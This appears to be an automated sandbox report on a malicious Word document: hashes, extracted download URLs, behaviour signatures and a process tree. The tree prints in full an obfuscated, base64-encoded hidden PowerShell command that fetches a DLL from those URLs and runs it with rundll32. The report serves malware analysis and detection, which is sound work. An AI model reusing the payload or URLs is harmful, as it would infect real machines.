Analysis
-
max time kernel
139s -
max time network
144s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
14-01-2021 07:46
Behavioral task
behavioral1
Sample
Bestand_61792947.doc
Resource
win7v20201028
Behavioral task
behavioral2
Sample
Bestand_61792947.doc
Resource
win10v20201028
General
-
Target
Bestand_61792947.doc
-
Size
160KB
-
MD5
fd662b4224eff8eb8d6c277c97bacbda
-
SHA1
adf4ec5325803601c09ab31af7840710d581aebb
-
SHA256
2e6137fcf557c34632120de28bb38abf3fa931a005e20b1379f2e8be842ba199
-
SHA512
0564cc91be29196c0202d3a59bc2f1d7927270a135b12bbeb49fbfeb090f481333bef69bc79d2b1a08b4f178e75b51ef9b65571383cc57f194fd49397ca80f12
Malware Config
Extracted
http://ketorecipesfit.com/wp-admin/afanv/
http://mertelofis.com/wp-content/As0/
http://givingthanksdaily.com/CP/
http://datawyse.net/0X3QY/
http://cs.lcxxny.com/wp-includes/E3U8nn/
http://makiyazhdoma.ru/blocked/tgEeW8M/
http://trustseal.enamad.ir.redshopfa.com/admit/wJJvvG/
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
cmd.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2996 3528 cmd.exe -
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exerundll32.exeflow pid process 20 3020 powershell.exe 28 1224 rundll32.exe -
Loads dropped DLL 1 IoCs
Processes:
rundll32.exepid process 2552 rundll32.exe -
Drops file in System32 directory 1 IoCs
Processes:
rundll32.exedescription ioc process File opened for modification C:\Windows\SysWOW64\Iazkxpdwiftfpqxs\vojnaocygxecjlo.dnj rundll32.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
Processes:
WINWORD.EXEpid process 1048 WINWORD.EXE 1048 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 7 IoCs
Processes:
powershell.exerundll32.exepid process 3020 powershell.exe 3020 powershell.exe 3020 powershell.exe 1224 rundll32.exe 1224 rundll32.exe 1224 rundll32.exe 1224 rundll32.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 3020 powershell.exe -
Suspicious use of SetWindowsHookEx 7 IoCs
Processes:
WINWORD.EXEpid process 1048 WINWORD.EXE 1048 WINWORD.EXE 1048 WINWORD.EXE 1048 WINWORD.EXE 1048 WINWORD.EXE 1048 WINWORD.EXE 1048 WINWORD.EXE -
Suspicious use of WriteProcessMemory 12 IoCs
Processes:
cmd.exepowershell.exerundll32.exerundll32.exedescription pid process target process PID 2996 wrote to memory of 2720 2996 cmd.exe msg.exe PID 2996 wrote to memory of 2720 2996 cmd.exe msg.exe PID 2996 wrote to memory of 3020 2996 cmd.exe powershell.exe PID 2996 wrote to memory of 3020 2996 cmd.exe powershell.exe PID 3020 wrote to memory of 2208 3020 powershell.exe rundll32.exe PID 3020 wrote to memory of 2208 3020 powershell.exe rundll32.exe PID 2208 wrote to memory of 2552 2208 rundll32.exe rundll32.exe PID 2208 wrote to memory of 2552 2208 rundll32.exe rundll32.exe PID 2208 wrote to memory of 2552 2208 rundll32.exe rundll32.exe PID 2552 wrote to memory of 1224 2552 rundll32.exe rundll32.exe PID 2552 wrote to memory of 1224 2552 rundll32.exe rundll32.exe PID 2552 wrote to memory of 1224 2552 rundll32.exe rundll32.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Bestand_61792947.doc" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\cmd.execmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc cwBlAHQALQBWAEEAUgBJAEEAYgBMAGUAIAAgAG4AaQA5ADcARAAgACAAKAAgACAAWwBUAFkAcABlAF0AKAAiAHsANQB9AHsAMAB9AHsAMgB9AHsAMQB9AHsANAB9AHsAMwB9ACIAIAAtAEYAJwB0AEUAJwAsACcAUgBFACcALAAnAG0ALgBpAG8ALgBEAEkAJwAsACcATwBSAFkAJwAsACcAYwB0ACcALAAnAHMAWQBzACcAKQApACAAOwBTAGUAVAAtAEkAVABlAG0AIAAgACgAIgBWAGEAIgArACIAUgBpACIAKwAiAEEAYgBMAEUAOgBrAGgAMAAiACsAIgB6AHEAeQAiACkAIAAgACgAWwBUAHkAUABFAF0AKAAiAHsAMAB9AHsAMgB9AHsANwB9AHsANgB9AHsAMwB9AHsANAB9AHsANQB9AHsAMQB9ACIALQBGACAAJwBzAFkAcwBUAEUAJwAsACcARQBSACcALAAnAE0ALgBOACcALAAnAFMARQAnACwAJwByAHYAaQBjAGUAcABPAGkAbgB0ACcALAAnAG0AQQBuAGEAZwAnACwAJwAuACcALAAnAEUAVAAnACkAIAApACAAIAA7ACQAWgB1AGwANAA1AHAAdgA9ACQAQQA3ADUAUAAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAVQAyADQAQgA7ACQASgA2ADMARgA9ACgAJwBBAF8AJwArACcAOQBKACcAKQA7ACAAIAAkAG4ASQA5ADcARAA6ADoAIgBDAHIARQBgAEEAYABUAGUARABpAGAAUgBFAGMAdABvAHIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHQAJwArACcAZAAnACsAKAAnAFkAJwArACcAQgB2AHYAJwApACsAJwBqACcAKwAnAG4AZQAnACsAJwBlAHQAJwArACgAJwBkAFkARwAnACsAJwBoACcAKwAnAHEAcQBxAGcAdgB0AGQAJwApACsAJwBZACcAKQAuACIAUgBgAEUAYABQAGwAYQBjAGUAIgAoACgAJwB0ACcAKwAnAGQAWQAnACkALAAnAFwAJwApACkAKQA7ACQASQAwADkARQA9ACgAKAAnAEsAJwArACcANQAxACcAKQArACcAWAAnACkAOwAgACQAawBIADAAegBRAHkAOgA6ACIAUwBgAGUAQwBVAHIAYABpAHQAYAB5AFAAUgBPAFQATwBDAE8ATAAiACAAPQAgACgAKAAnAFQAJwArACcAbABzADEAJwApACsAJwAyACcAKQA7ACQARwAwAF8AQgA9ACgAJwBFAF8AJwArACcAMQBMACcAKQA7ACQASQA5AG0AeABoAG0AcwAgAD0AIAAoACcASwA0ACcAKwAnADIATgAnACkAOwAkAFAAOAAxAEIAPQAoACcATgA4ACcAKwAnADkAWQAnACkAOwAkAEwAdAB4AHAAaQA5AGUAPQAkAEgATwBNAEUAKwAoACgAKAAnAEMAJwArACcATQA0AEIAdgB2AGoAbgAnACsAJwBlAGUAQwAnACsAJwBNACcAKQArACcANABHACcAKwAnAGgAJwArACgAJwBxAHEAJwArACcAcQBnACcAKQArACcAdgBDACcAKwAnAE0ANAAnACkALgAiAFIAYABlAHAAbABBAGAAQwBlACIAKAAoACcAQwAnACsAJwBNADQAJwApACwAJwBcACcAKQApACsAJABJADkAbQB4AGgAbQBzACsAKAAnAC4AZAAnACsAJwBsAGwAJwApADsAJABFADAAMwBVAD0AKAAoACcASwAyACcAKwAnADUAJwApACsAJwBBACcAKQA7ACQARQBmADMAMwBzADQAcQA9ACgAJwBBACcAKwAoACcAXQBbAHEAWwBEACcAKwAnADoAJwApACsAKAAnAC8ALwAnACsAJwBrAGUAdABvACcAKQArACcAcgAnACsAKAAnAGUAJwArACcAYwBpACcAKQArACcAcABlACcAKwAoACcAcwBmAGkAdAAnACsAJwAuACcAKwAnAGMAbwBtAC8AdwBwACcAKQArACgAJwAtACcAKwAnAGEAZAAnACkAKwAnAG0AJwArACcAaQAnACsAJwBuACcAKwAnAC8AJwArACgAJwBhAGYAYQAnACsAJwBuACcAKQArACcAdgAvACcAKwAoACcAQAAnACsAJwBBAF0AJwApACsAKAAnAFsAcQAnACsAJwBbAEQAOgAnACkAKwAnAC8AJwArACgAJwAvAG0AZQAnACsAJwByACcAKQArACgAJwB0ACcAKwAnAGUAbABvAGYAaQBzACcAKQArACcALgAnACsAJwBjACcAKwAoACcAbwAnACsAJwBtAC8AdwAnACkAKwAoACcAcAAtACcAKwAnAGMAbwAnACkAKwAnAG4AJwArACgAJwB0ACcAKwAnAGUAbgAnACkAKwAoACcAdAAvACcAKwAnAEEAJwApACsAJwBzACcAKwAoACcAMAAvAEAAJwArACcAQQBdACcAKwAnAFsAJwApACsAJwBxAFsAJwArACcARAA6ACcAKwAoACcALwAnACsAJwAvAGcAaQAnACkAKwAoACcAdgBpACcAKwAnAG4AJwApACsAJwBnACcAKwAoACcAdABoAGEAJwArACcAbgBrAHMAJwApACsAKAAnAGQAYQAnACsAJwBpACcAKQArACgAJwBsAHkALgBjAG8AJwArACcAbQAnACsAJwAvAEMAUAAvACcAKQArACgAJwBAAEEAJwArACcAXQAnACkAKwAoACcAWwAnACsAJwBxACcAKwAnAFsARAA6AC8ALwBkAGEAdAAnACsAJwBhAHcAeQAnACkAKwAnAHMAZQAnACsAKAAnAC4AbgAnACsAJwBlACcAKQArACcAdAAvACcAKwAoACcAMABYADMAUQAnACsAJwBZACcAKQArACcALwBAACcAKwAoACcAQQBdACcAKwAnAFsAcQBbACcAKQArACgAJwBEADoALwAvAGMAJwArACcAcwAnACkAKwAoACcALgBsAGMAeAB4AG4AeQAnACsAJwAuACcAKQArACgAJwBjACcAKwAnAG8AbQAnACkAKwAnAC8AdwAnACsAJwBwACcAKwAnAC0AaQAnACsAKAAnAG4AYwAnACsAJwBsACcAKQArACgAJwB1AGQAJwArACcAZQBzACcAKwAnAC8AJwArACcARQAzACcAKwAnAFUAOABuAG4ALwBAAEEAXQAnACsAJwBbAHEAWwBEADoAJwArACcALwAnACsAJwAvAG0AJwApACsAKAAnAGEAJwArACcAawBpACcAKQArACcAeQAnACsAKAAnAGEAegBoACcAKwAnAGQAJwApACsAKAAnAG8AbQAnACsAJwBhAC4AcgAnACsAJwB1ACcAKQArACcALwAnACsAJwBiACcAKwAoACcAbABvAGMAawBlACcAKwAnAGQAJwArACcALwB0AGcAJwApACsAJwBFAGUAJwArACcAVwAnACsAKAAnADgATQAnACsAJwAvACcAKQArACgAJwBAAEEAJwArACcAXQBbAHEAJwArACcAWwBEADoALwAvACcAKQArACcAdAAnACsAKAAnAHIAJwArACcAdQBzAHQAcwAnACsAJwBlAGEAbAAuAGUAbgAnACkAKwAoACcAYQAnACsAJwBtAGEAZAAuACcAKwAnAGkAcgAnACkAKwAoACcALgByACcAKwAnAGUAZAAnACkAKwAnAHMAaAAnACsAKAAnAG8AcAAnACsAJwBmAGEALgBjACcAKwAnAG8AbQAvAGEAJwApACsAKAAnAGQAbQAnACsAJwBpAHQAJwArACcALwB3AEoASgB2AHYARwAvACcAKQApAC4AIgByAEUAcABsAEEAYABDAGUAIgAoACgAKAAnAEEAJwArACcAXQBbAHEAJwApACsAJwBbAEQAJwApACwAKABbAGEAcgByAGEAeQBdACgAKAAnAGQAcwAnACsAKAAnAGUAdwAnACsAJwBmACcAKQApACwAKAAoACcAdwBlACcAKwAnAHYAJwApACsAJwB3AGUAJwApACkALAAoACgAJwBhAGUAJwArACcAZgAnACkAKwAnAGYAJwApACwAKAAnAGgAdAAnACsAJwB0AHAAJwApACkAWwAyAF0AKQAuACIAcwBwAGAATABpAFQAIgAoACQATwA3ADMATAAgACsAIAAkAFoAdQBsADQANQBwAHYAIAArACAAJABBAF8ANABDACkAOwAkAEEAOAAzAEsAPQAoACgAJwBVADQAJwArACcAXwAnACkAKwAnAE0AJwApADsAZgBvAHIAZQBhAGMAaAAgACgAJABRAHYAdABuAGQAdgBfACAAaQBuACAAJABFAGYAMwAzAHMANABxACkAewB0AHIAeQB7ACgAJgAoACcATgAnACsAJwBlAHcALQBPAGIAagAnACsAJwBlAGMAdAAnACkAIABTAFkAUwBUAEUATQAuAG4AZQBUAC4AVwBFAEIAYwBsAGkAZQBOAFQAKQAuACIAZABPAHcATgBgAEwATwBBAGQAYABGAEkATABFACIAKAAkAFEAdgB0AG4AZAB2AF8ALAAgACQATAB0AHgAcABpADkAZQApADsAJABOADEAMQBDAD0AKAAoACcASQAnACsAJwA5ADMAJwApACsAJwBLACcAKQA7AEkAZgAgACgAKAAmACgAJwBHAGUAJwArACcAdAAtAEkAdABlAG0AJwApACAAJABMAHQAeABwAGkAOQBlACkALgAiAGwARQBuAGAAZwBgAFQAaAAiACAALQBnAGUAIAA0ADYAOAA1ADUAKQAgAHsAJgAoACcAcgB1ACcAKwAnAG4AZABsAGwAJwArACcAMwAyACcAKQAgACQATAB0AHgAcABpADkAZQAsACgAJwBTACcAKwAoACcAaAAnACsAJwBvACcAKwAnAHcARABpAGEAbAAnACkAKwAoACcAbwBnACcAKwAnAEEAJwApACkALgAiAHQAbwBzAFQAYABSAGkAYABOAGcAIgAoACkAOwAkAFgAMgBfAEYAPQAoACcATAA3ACcAKwAnADIASwAnACkAOwBiAHIAZQBhAGsAOwAkAEwAOAA4AFgAPQAoACcAUQAwACcAKwAnADcARwAnACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEYAXwA2AEMAPQAoACgAJwBOADIAJwArACcAMAAnACkAKwAnAFAAJwApAA==1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\msg.exemsg Admin /v Word experienced an error trying to open the file.2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -w hidden -enc cwBlAHQALQBWAEEAUgBJAEEAYgBMAGUAIAAgAG4AaQA5ADcARAAgACAAKAAgACAAWwBUAFkAcABlAF0AKAAiAHsANQB9AHsAMAB9AHsAMgB9AHsAMQB9AHsANAB9AHsAMwB9ACIAIAAtAEYAJwB0AEUAJwAsACcAUgBFACcALAAnAG0ALgBpAG8ALgBEAEkAJwAsACcATwBSAFkAJwAsACcAYwB0ACcALAAnAHMAWQBzACcAKQApACAAOwBTAGUAVAAtAEkAVABlAG0AIAAgACgAIgBWAGEAIgArACIAUgBpACIAKwAiAEEAYgBMAEUAOgBrAGgAMAAiACsAIgB6AHEAeQAiACkAIAAgACgAWwBUAHkAUABFAF0AKAAiAHsAMAB9AHsAMgB9AHsANwB9AHsANgB9AHsAMwB9AHsANAB9AHsANQB9AHsAMQB9ACIALQBGACAAJwBzAFkAcwBUAEUAJwAsACcARQBSACcALAAnAE0ALgBOACcALAAnAFMARQAnACwAJwByAHYAaQBjAGUAcABPAGkAbgB0ACcALAAnAG0AQQBuAGEAZwAnACwAJwAuACcALAAnAEUAVAAnACkAIAApACAAIAA7ACQAWgB1AGwANAA1AHAAdgA9ACQAQQA3ADUAUAAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAVQAyADQAQgA7ACQASgA2ADMARgA9ACgAJwBBAF8AJwArACcAOQBKACcAKQA7ACAAIAAkAG4ASQA5ADcARAA6ADoAIgBDAHIARQBgAEEAYABUAGUARABpAGAAUgBFAGMAdABvAHIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHQAJwArACcAZAAnACsAKAAnAFkAJwArACcAQgB2AHYAJwApACsAJwBqACcAKwAnAG4AZQAnACsAJwBlAHQAJwArACgAJwBkAFkARwAnACsAJwBoACcAKwAnAHEAcQBxAGcAdgB0AGQAJwApACsAJwBZACcAKQAuACIAUgBgAEUAYABQAGwAYQBjAGUAIgAoACgAJwB0ACcAKwAnAGQAWQAnACkALAAnAFwAJwApACkAKQA7ACQASQAwADkARQA9ACgAKAAnAEsAJwArACcANQAxACcAKQArACcAWAAnACkAOwAgACQAawBIADAAegBRAHkAOgA6ACIAUwBgAGUAQwBVAHIAYABpAHQAYAB5AFAAUgBPAFQATwBDAE8ATAAiACAAPQAgACgAKAAnAFQAJwArACcAbABzADEAJwApACsAJwAyACcAKQA7ACQARwAwAF8AQgA9ACgAJwBFAF8AJwArACcAMQBMACcAKQA7ACQASQA5AG0AeABoAG0AcwAgAD0AIAAoACcASwA0ACcAKwAnADIATgAnACkAOwAkAFAAOAAxAEIAPQAoACcATgA4ACcAKwAnADkAWQAnACkAOwAkAEwAdAB4AHAAaQA5AGUAPQAkAEgATwBNAEUAKwAoACgAKAAnAEMAJwArACcATQA0AEIAdgB2AGoAbgAnACsAJwBlAGUAQwAnACsAJwBNACcAKQArACcANABHACcAKwAnAGgAJwArACgAJwBxAHEAJwArACcAcQBnACcAKQArACcAdgBDACcAKwAnAE0ANAAnACkALgAiAFIAYABlAHAAbABBAGAAQwBlACIAKAAoACcAQwAnACsAJwBNADQAJwApACwAJwBcACcAKQApACsAJABJADkAbQB4AGgAbQBzACsAKAAnAC4AZAAnACsAJwBsAGwAJwApADsAJABFADAAMwBVAD0AKAAoACcASwAyACcAKwAnADUAJwApACsAJwBBACcAKQA7ACQARQBmADMAMwBzADQAcQA9ACgAJwBBACcAKwAoACcAXQBbAHEAWwBEACcAKwAnADoAJwApACsAKAAnAC8ALwAnACsAJwBrAGUAdABvACcAKQArACcAcgAnACsAKAAnAGUAJwArACcAYwBpACcAKQArACcAcABlACcAKwAoACcAcwBmAGkAdAAnACsAJwAuACcAKwAnAGMAbwBtAC8AdwBwACcAKQArACgAJwAtACcAKwAnAGEAZAAnACkAKwAnAG0AJwArACcAaQAnACsAJwBuACcAKwAnAC8AJwArACgAJwBhAGYAYQAnACsAJwBuACcAKQArACcAdgAvACcAKwAoACcAQAAnACsAJwBBAF0AJwApACsAKAAnAFsAcQAnACsAJwBbAEQAOgAnACkAKwAnAC8AJwArACgAJwAvAG0AZQAnACsAJwByACcAKQArACgAJwB0ACcAKwAnAGUAbABvAGYAaQBzACcAKQArACcALgAnACsAJwBjACcAKwAoACcAbwAnACsAJwBtAC8AdwAnACkAKwAoACcAcAAtACcAKwAnAGMAbwAnACkAKwAnAG4AJwArACgAJwB0ACcAKwAnAGUAbgAnACkAKwAoACcAdAAvACcAKwAnAEEAJwApACsAJwBzACcAKwAoACcAMAAvAEAAJwArACcAQQBdACcAKwAnAFsAJwApACsAJwBxAFsAJwArACcARAA6ACcAKwAoACcALwAnACsAJwAvAGcAaQAnACkAKwAoACcAdgBpACcAKwAnAG4AJwApACsAJwBnACcAKwAoACcAdABoAGEAJwArACcAbgBrAHMAJwApACsAKAAnAGQAYQAnACsAJwBpACcAKQArACgAJwBsAHkALgBjAG8AJwArACcAbQAnACsAJwAvAEMAUAAvACcAKQArACgAJwBAAEEAJwArACcAXQAnACkAKwAoACcAWwAnACsAJwBxACcAKwAnAFsARAA6AC8ALwBkAGEAdAAnACsAJwBhAHcAeQAnACkAKwAnAHMAZQAnACsAKAAnAC4AbgAnACsAJwBlACcAKQArACcAdAAvACcAKwAoACcAMABYADMAUQAnACsAJwBZACcAKQArACcALwBAACcAKwAoACcAQQBdACcAKwAnAFsAcQBbACcAKQArACgAJwBEADoALwAvAGMAJwArACcAcwAnACkAKwAoACcALgBsAGMAeAB4AG4AeQAnACsAJwAuACcAKQArACgAJwBjACcAKwAnAG8AbQAnACkAKwAnAC8AdwAnACsAJwBwACcAKwAnAC0AaQAnACsAKAAnAG4AYwAnACsAJwBsACcAKQArACgAJwB1AGQAJwArACcAZQBzACcAKwAnAC8AJwArACcARQAzACcAKwAnAFUAOABuAG4ALwBAAEEAXQAnACsAJwBbAHEAWwBEADoAJwArACcALwAnACsAJwAvAG0AJwApACsAKAAnAGEAJwArACcAawBpACcAKQArACcAeQAnACsAKAAnAGEAegBoACcAKwAnAGQAJwApACsAKAAnAG8AbQAnACsAJwBhAC4AcgAnACsAJwB1ACcAKQArACcALwAnACsAJwBiACcAKwAoACcAbABvAGMAawBlACcAKwAnAGQAJwArACcALwB0AGcAJwApACsAJwBFAGUAJwArACcAVwAnACsAKAAnADgATQAnACsAJwAvACcAKQArACgAJwBAAEEAJwArACcAXQBbAHEAJwArACcAWwBEADoALwAvACcAKQArACcAdAAnACsAKAAnAHIAJwArACcAdQBzAHQAcwAnACsAJwBlAGEAbAAuAGUAbgAnACkAKwAoACcAYQAnACsAJwBtAGEAZAAuACcAKwAnAGkAcgAnACkAKwAoACcALgByACcAKwAnAGUAZAAnACkAKwAnAHMAaAAnACsAKAAnAG8AcAAnACsAJwBmAGEALgBjACcAKwAnAG8AbQAvAGEAJwApACsAKAAnAGQAbQAnACsAJwBpAHQAJwArACcALwB3AEoASgB2AHYARwAvACcAKQApAC4AIgByAEUAcABsAEEAYABDAGUAIgAoACgAKAAnAEEAJwArACcAXQBbAHEAJwApACsAJwBbAEQAJwApACwAKABbAGEAcgByAGEAeQBdACgAKAAnAGQAcwAnACsAKAAnAGUAdwAnACsAJwBmACcAKQApACwAKAAoACcAdwBlACcAKwAnAHYAJwApACsAJwB3AGUAJwApACkALAAoACgAJwBhAGUAJwArACcAZgAnACkAKwAnAGYAJwApACwAKAAnAGgAdAAnACsAJwB0AHAAJwApACkAWwAyAF0AKQAuACIAcwBwAGAATABpAFQAIgAoACQATwA3ADMATAAgACsAIAAkAFoAdQBsADQANQBwAHYAIAArACAAJABBAF8ANABDACkAOwAkAEEAOAAzAEsAPQAoACgAJwBVADQAJwArACcAXwAnACkAKwAnAE0AJwApADsAZgBvAHIAZQBhAGMAaAAgACgAJABRAHYAdABuAGQAdgBfACAAaQBuACAAJABFAGYAMwAzAHMANABxACkAewB0AHIAeQB7ACgAJgAoACcATgAnACsAJwBlAHcALQBPAGIAagAnACsAJwBlAGMAdAAnACkAIABTAFkAUwBUAEUATQAuAG4AZQBUAC4AVwBFAEIAYwBsAGkAZQBOAFQAKQAuACIAZABPAHcATgBgAEwATwBBAGQAYABGAEkATABFACIAKAAkAFEAdgB0AG4AZAB2AF8ALAAgACQATAB0AHgAcABpADkAZQApADsAJABOADEAMQBDAD0AKAAoACcASQAnACsAJwA5ADMAJwApACsAJwBLACcAKQA7AEkAZgAgACgAKAAmACgAJwBHAGUAJwArACcAdAAtAEkAdABlAG0AJwApACAAJABMAHQAeABwAGkAOQBlACkALgAiAGwARQBuAGAAZwBgAFQAaAAiACAALQBnAGUAIAA0ADYAOAA1ADUAKQAgAHsAJgAoACcAcgB1ACcAKwAnAG4AZABsAGwAJwArACcAMwAyACcAKQAgACQATAB0AHgAcABpADkAZQAsACgAJwBTACcAKwAoACcAaAAnACsAJwBvACcAKwAnAHcARABpAGEAbAAnACkAKwAoACcAbwBnACcAKwAnAEEAJwApACkALgAiAHQAbwBzAFQAYABSAGkAYABOAGcAIgAoACkAOwAkAFgAMgBfAEYAPQAoACcATAA3ACcAKwAnADIASwAnACkAOwBiAHIAZQBhAGsAOwAkAEwAOAA4AFgAPQAoACcAUQAwACcAKwAnADcARwAnACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEYAXwA2AEMAPQAoACgAJwBOADIAJwArACcAMAAnACkAKwAnAFAAJwApAA==2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" C:\Users\Admin\Bvvjnee\Ghqqqgv\K42N.dll,ShowDialogA3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" C:\Users\Admin\Bvvjnee\Ghqqqgv\K42N.dll,ShowDialogA4⤵
- Loads dropped DLL
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Iazkxpdwiftfpqxs\vojnaocygxecjlo.dnj",ShowDialogA5⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\Bvvjnee\Ghqqqgv\K42N.dllMD5
c3ca293c81bb2120ddfd6afe4b36067d
SHA153699c4f6b813410a2d0cdcab63d143c5dcc4d6c
SHA256026ea26b443159bab5120192ec8e80766d44231ba8642fb74a32695a46de95ca
SHA5123f5bafcc9b9a17dbb4465989db23236247c971fc7182e7c2ad67d90c4c981570d9e93dfdc720e5330a0bc5b390a5e24ba5dd1903b3879cb9e1885fbe2b566a9f
-
\Users\Admin\Bvvjnee\Ghqqqgv\K42N.dllMD5
c3ca293c81bb2120ddfd6afe4b36067d
SHA153699c4f6b813410a2d0cdcab63d143c5dcc4d6c
SHA256026ea26b443159bab5120192ec8e80766d44231ba8642fb74a32695a46de95ca
SHA5123f5bafcc9b9a17dbb4465989db23236247c971fc7182e7c2ad67d90c4c981570d9e93dfdc720e5330a0bc5b390a5e24ba5dd1903b3879cb9e1885fbe2b566a9f
-
memory/1048-2-0x00000268A1550000-0x00000268A1B87000-memory.dmpFilesize
6.2MB
-
memory/1224-12-0x0000000000000000-mapping.dmp
-
memory/2208-8-0x0000000000000000-mapping.dmp
-
memory/2552-10-0x0000000000000000-mapping.dmp
-
memory/2720-3-0x0000000000000000-mapping.dmp
-
memory/3020-4-0x0000000000000000-mapping.dmp
-
memory/3020-5-0x00007FFE99510000-0x00007FFE99EFC000-memory.dmpFilesize
9.9MB
-
memory/3020-6-0x000001BF66EE0000-0x000001BF66EE1000-memory.dmpFilesize
4KB
-
memory/3020-7-0x000001BF67090000-0x000001BF67091000-memory.dmpFilesize
4KB